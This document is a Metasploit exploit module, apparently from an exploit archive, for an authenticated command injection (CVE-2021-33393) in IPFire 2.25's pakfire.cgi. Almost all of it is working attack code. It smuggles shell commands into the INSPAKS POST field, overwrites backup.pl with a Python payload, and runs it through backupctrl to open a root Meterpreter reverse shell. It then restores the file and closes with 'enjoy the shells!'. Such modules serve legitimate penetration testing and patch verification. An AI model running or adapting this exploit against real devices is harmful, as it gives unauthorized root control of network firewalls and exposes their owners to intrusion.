IPFire 2.25 Remote Code Execution

This Metasploit module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.


MD5 | 69d36ee1b60ffec6d31a6ebc94e2dc1e

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE',
'Description' => %q{
This module exploits an authenticated command injection vulnerability in the
/cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156
and prior to execute arbitrary code as the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mücahit Saratar <[email protected]>', # vulnerability research & exploit development
'Grant Willcox' # Module enhancements and documentation fixes.
],
'References' =>
[
[ 'EDB', '49869' ],
[ 'CVE', '2021-33393'],
[ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],
[ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],
],
'Platform' => ['python' ],
'Privileged' => true,
'Arch' => [ ARCH_PYTHON ],
'Targets' =>
[
[
'Python Dropper',
{
'Platform' => 'python',
'Arch' => [ ARCH_PYTHON ],
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'python/meterpreter/reverse_tcp'
}
}
]
],
'DisclosureDate' => '2021-05-17',
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ]
},
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RPORT(444),
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to login with', '']),
]
)
end

def vpath
'/cgi-bin/pakfire.cgi' # vulnerable path
end

def send_packet(method, execstr, waitsec)
myheaders = {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/"
}
if method == 'GET'
response = send_request_cgi(
'uri' => vpath,
'headers' => myheaders,
'SSL' => true,
'timeout' => waitsec
)
else
response = send_request_cgi(
'uri' => vpath,
'headers' => myheaders,
'SSL' => true,
'method' => 'POST',
'vars_post' => {
'INSPAKS' => ";#{execstr}",
'ACTION' => 'install',
'x' => Rex::Text.rand_text_numeric(2),
'y' => Rex::Text.rand_text_numeric(2)
},
'timeout' => waitsec
)
end
response
end

def check
cevap = send_packet('GET', '', 10)
if cevap.nil? || cevap.body.empty?
return CheckCode::Unknown('No response from the target!')
end

unless cevap.body.scan(/401 Unauthorized/).empty?
return CheckCode::Unknown('Invalid credentials supplied! Check USERNAME and PASSWORD options!')
end

version = cevap.body.scan(/IPFire (.*) \(.*\) - Core Update [0-9]{3}/).flatten[0] || ''
core = cevap.body.scan(/IPFire .* \(.*\) - Core Update (.*)/).flatten[0] || ''
unless version
return CheckCode::Safe('Target is not IPFire')
end
if core.to_i >= 157
return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")
end

CheckCode::Appears("Target is running IPFire #{version} (Core Update #{core})")
end

def exploit
temp_backup_file = Rex::Text.rand_text_alphanumeric(5, 30)
print_status("Backing up backup.pl to /tmp/#{temp_backup_file}...")
if send_packet('POST', "cp /var/ipfire/backup/bin/backup.pl /tmp/#{temp_backup_file}", 1).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to back up backup.pl!")
end

print_status('Overwriting the contents of backup.pl with a Python header statement')
if send_packet('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")
end

print_status('Appending the contents of backup.pl with the Python code to be executed.')
if send_packet('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")
end

print_status('Executing /usr/local/bin/backupctrl to run the payload')
unless send_packet('POST', '/usr/local/bin/backupctrl', 1).nil?
fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')
end

print_good('You should now have your shell, restoring the original contents of the backup.pl file...')
if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")
end

print_status('All done, enjoy the shells!')
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end

Related Posts